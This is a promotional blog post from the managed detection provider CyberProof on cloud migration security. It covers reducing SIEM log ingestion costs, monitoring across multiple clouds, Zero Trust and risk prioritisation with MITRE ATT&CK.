Cloud-native infrastructure holds the promise of greater ease of deployment and faster time to value. It has elasticity built-in and leverages cloud speed. Moreover, cloud-native infrastructure has the potential to be more budget friendly – allowing enterprises to scale their financial investments to the resources they require, by using a software-as-a-service (SaaS) model.
At the same time, enterprises migrating their workloads and infrastructure to cloud-native security architectures are faced with a wide variety of challenges, not the least of which is handling Big Data – incredibly large volumes of logs coming from new data sources such as Virtual Machines (VMs), SaaS applications, containers, and other cloud native resources.
Moreover, cloud-migration involves implementing a completely new operational model for infrastructure in the cloud. New asset types need to be tracked and managed, and their associated vulnerabilities need to be addressed.
The Challenge: Higher Costs & Data Overload
Cloud-native Security Analytics solutions like Microsoft Sentinel provide the ability to ingest vast amounts of data at cloud speed and scale, supported by numerous data connectors ensuring data velocity, variety, veracity and value. A cloud-native Security Incident & Event Management (SIEM) platform simplifies the ability to integrate cloud security data from multiple cloud environments – enhancing Security Analytics capabilities.
The exponentially greater quantities of data also can lead to higher costs – as cost is a direct reflection of how much data has been ingested. Moreover, “data overload” can result. Without the right strategy in place, cloud migration can be likened, metaphorically, to a miner who is standing on a goldmine, but without a shovel. “Data overload” raises the risk of security analysts losing sight of the key insights.
These challenges can be addressed by implementing strategies that optimize the organization’s threat monitoring capabilities while simultaneously keeping costs low.
Let’s look at 4 strategies for optimization that are key for any enterprise undergoing cloud migration:
- Reducing the Cost of Log Ingestion & Storage
The difficulties of managing Big Data, on the one hand – while keeping costs down, on the other hand – can be approached by means of a well-defined data collection and pre-processing strategy. Advanced data collection solutions can be used to optimize data collection by means of data tagging, filtering, custom parsing, indexing, aggregation, and targeted routing to the data storage & analytics workspace.
To enable this, a robust data collection layer is needed, and with the ability to support various data collection methods such as syslog, database event pull, API, texts and more.
The recommended approach is to:
- First, securely collect and stream every available data leveraging the advanced data collection infrastructure.
- Then, store the data in optimized storage options such as Microsoft Azure Data Explorer (ADX).
- Finally, route the higher value data into the Azure Sentinel for real-time threat analytics.
In this way, you do not compromise on the ability collect & store data and leverage this information to perform custom visualizations, reporting and hunting – in addition to conducting custom querying. High-value data is used for real-time correlation and analytics, and you maintain the ability to glean the right security insights from data with custom visualizations and reports while getting real-time threat insights. At the same time, you reduce the costs of log ingestion and storage.
- Monitoring Across Multiple Clouds & Locations
Many enterprises today leverage a multi-cloud environment and manage their cloud resources & workloads in specific locations – and there are good reasons for doing so. For example, a typical enterprise-level organization might leverage the best capabilities of different environments:
- Providing a custom application development & hosting environment for developers in AWS
- Utilizing the Azure environment for cloud computing, workplace collaboration, and productivity
- Leveraging Google for data warehousing and cloud analytics
The data and resources associated with each of these resources need to be monitored while they continue to reside in their respective environments.
The security situation is further complicated by the fact that the data for each of these clouds may be stored in multiple locations. This may be done to meet various business challenges, including processing data locally and filtering out sensitive data – as well as to align with regulatory requirements. As a result, an enterprise typically will have multiple instances of clouds – multiple subscriptions for Google or AWS, or multiple tenants for Azure.
Each location is likely to have its own management policies. The question therefore is how to maintain effective monitoring across multiple clouds – each of which uses different languages, schemas, and standards – and bring it all together successfully into a single view?
A cloud-native SIEM provides the solution, supporting integration across all cloud providers – offering a centralized, consolidated view of threats by monitoring data wherever it may be. Moreover, a centralized data lake such as ADX, which is designed to handle Big Data, facilitates cost-effective management across multiple clouds and locations. Today, advanced Managed Detection & Response (MDR) providers like CyberProof, a UST company are offering this kind of multiple, overlapping security monitoring capability.
- Implementing Zero Trust
Zero Trust refers to the continuous validation of access at all steps of a digital interaction. It means providing each user with minimal required access or capabilities, while offering access from any location and providing endpoint detection, identity protection, and vulnerability management per device.
Because Zero Trust is complex, it involves more sophisticated asset management, which requires that an enterprise maintain full visibility of its assets. Visibility is essential to establishing the right level of security control and monitoring all the assets through threat detection & response, threat intelligence, and vulnerability management.
But how do you maintain this level of control with the exponentially greater quantities information associated with a cloud-native environment? The answer involves quantifying risk based on an in-depth understanding of exactly what you’re looking for.
If cybersecurity in a cloud-native environment must operate from a risk-based approach, then the first step in evaluating risk involves identifying which threats and threat actors pose the greater risks to a particular enterprise. Each organization must map out its assets, then evaluate (1) what types of threats these assets are likely to face, and (2) which threat actors are most likely to attack. To be effective this assessment must be based on high-level Cyber Threat Intelligence (CTI) input that relates to a wide variety of parameters specific to the enterprise, including:
- Data type
- Who has received access
- Prioritizing Risk with the MITRE Framework
Once you have evaluated the types of threats and threat actors that an enterprise is likely to face, you can prioritize threat detection & response capabilities leveraging a framework such as the MITRE’s Attacker Tactics, Techniques, and Common Knowledge (ATT&CK) framework.
The ATT&CK framework creates a categorized list of all known attack methods and marries each attack method with:
- Threat intelligence groups that are known to utilize them
- The unique methods used in implementing the attacks
- The mitigations and detection methods for identifying attacker techniques
The beauty of the ATT&CK framework is that it provides direction for security teams making decisions related to developing their security operations center (SOC) strategy. More specifically, it helps ensure that use case development is continuously geared toward meeting the most likely threats to the business.
At CyberProof, for example, we optimize use case development using our Use Case Factory, which provides agile development of threat detection & response content and continuous improvement, to align with changing cyber trends and evolving threats.
Migrating to the Cloud? First – Address the Risks
While cloud-native infrastructure offers so many benefits for enterprises over on-prem. IT environments, it must be managed correctly to keep down data ingestion costs and mitigate cybersecurity risks. The drastic changes involved in migrating an enterprise organization to the cloud impacts all aspects of security operations and creates new risks and challenges for the team, which explains why cybersecurity asset management is currently such a hot topic.
Working with an advanced MDR provider gives you access to the expertise you need to explore, develop and implement strategies such as: reducing the cost of log ingestion & storage, monitoring multiple clouds and geolocations, implementing Zero Trust, and mitigating risk through use of a framework like the MITRE ATT&CK.
If you’re interested in speaking with Jaimon Thomas or another member of the team about optimizing cloud migration to reduce risk, contact CyberProof-a UST company.